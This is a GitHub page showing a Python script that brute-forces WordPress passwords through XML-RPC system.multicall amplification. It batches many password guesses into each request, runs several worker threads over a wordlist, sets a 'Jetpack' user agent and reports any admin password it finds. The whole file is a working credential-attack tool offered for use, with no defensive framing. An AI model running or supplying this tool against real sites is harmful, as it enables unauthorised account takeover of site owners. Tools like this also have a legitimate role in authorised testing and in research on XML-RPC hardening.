forked from DavidWittman/wpxmlrpcbrute
-
Notifications
You must be signed in to change notification settings - Fork 0
/
wpxmlrpcbrute.py
executable file
·173 lines (138 loc) · 5.08 KB
/
wpxmlrpcbrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
#!/usr/bin/env python
import argparse
import logging
import Queue
import requests
import sys
import threading
import time
import xml.etree.ElementTree as XmlTree
from datetime import datetime
logging.basicConfig(format='%(asctime)s %(name)s %(levelname)s %(message)s')
log = logging.getLogger('wpxmlbrute')
# silence log messages from requests
logging.getLogger('requests').setLevel(logging.CRITICAL)
XML_START = (
"<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall><methodName>"
"system.multicall</methodName> <params><param><value><array><data><value>"
)
XML_END = "</value></data></array></value></param></params></methodCall>"
XML_REQ = (
"<struct><member><name>methodName</name><value><string>wp.getAuthors"
"</string></value></member><member><name>params</name><value><array><data>"
"<value><string>1</string></value><value><string>%s</string></value><value>"
"<string>%s</string></value></data></array></value></member></struct>"
)
DEFAULT_USER_AGENT = "Jetpack"
def generate_request_body(user, passwords):
body = [XML_START]
for password in passwords:
body.append(XML_REQ % (user, password))
body.append(XML_END)
return ''.join(body)
def brute_attempt(url, user, passwords):
body = generate_request_body(user, passwords)
headers = {
'Content-Type': 'application/xml',
'User-Agent': DEFAULT_USER_AGENT
}
result = requests.post(url, data=body, headers=headers)
xml_root = XmlTree.fromstring(result.text)
i = 0
for elem in xml_root.findall('.//struct'):
if elem[0].findtext('name') != 'faultCode':
return passwords[i]
i += 1
return None
def brute_consumer(queue, results, url, user):
while not queue.empty():
try:
passwords = queue.get()
except Queue.Empty:
break
result = brute_attempt(url, user, passwords)
if result != None:
results.append(result)
def populate_queue(queue, wordlist, count):
with open(wordlist) as f:
group = []
while True:
line = f.readline()
# Empty string is the EOF
if line == '':
if len(group) > 0:
log.debug("Finished processing %s. Waiting for workers to "
"complete." % wordlist)
queue.put(group, block=True)
break
group.append(line.strip())
if len(group) == count:
queue.put(group, block=True)
group = []
def main():
desc = "Brute force WordPress sites vulnerable to XML-RPC amplification."
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-c', '--count', type=int, default=100,
help="Number of passwords to send in each request. Default: 100")
parser.add_argument('-t', '--threads', type=int, default=4,
help="Number of threads to spawn. Default: 4")
parser.add_argument('-u', '--user', default="admin",
help="WordPress username to brute force. Default: admin")
# TODO: This doesn't actually do anything
#parser.add_argument('-a', '--user-agent', default="")
parser.add_argument('-l', '--level', type=int, default=1,
help="Log level (1-5). 1 = debug, 5 = critical. Default: 1")
parser.add_argument('url', help="URL of WordPress site to brute force")
parser.add_argument('wordlist', help="Path of the password list to use")
args = parser.parse_args()
log.setLevel(args.level*10)
if args.count < 1:
raise SystemExit("count should be >= 0")
if not args.url.endswith('xmlrpc.php'):
if not args.url.endswith('/'):
args.url += '/'
args.url += 'xmlrpc.php'
threads = []
queue = Queue.Queue(maxsize=args.threads*10)
results = []
start_time = datetime.now()
producer = threading.Thread(
target=populate_queue,
args=(queue, args.wordlist, args.count)
)
producer.daemon = True
producer.start()
while queue.qsize() < args.threads:
log.debug("Waiting for queue to populate. Size: %s" % queue.qsize())
time.sleep(0.1)
for i in range(args.threads):
t = threading.Thread(
target=brute_consumer,
args=(
queue, results, args.url, args.user
)
)
log.debug("Starting %s" % t.name)
t.daemon = True
t.start()
threads.append(t)
while True:
for t in threads:
if t.is_alive():
t.join(0.25)
else:
log.debug("%s complete" % t.name)
threads.remove(t)
log.debug("Threads running: %s" % len(threads))
log.debug("Queue size: %s" % queue.qsize())
if len(threads) == 0 or len(results) > 0:
break
log.debug("Results: %s" % results)
log.info(("Elapsed time: %s" % (datetime.now() - start_time)))
if len(results) > 0:
print("Password found for %s: %s" % (args.user, results[0]))
else:
print("Password not found in wordlist")
sys.exit(1)
if __name__ == '__main__':
main()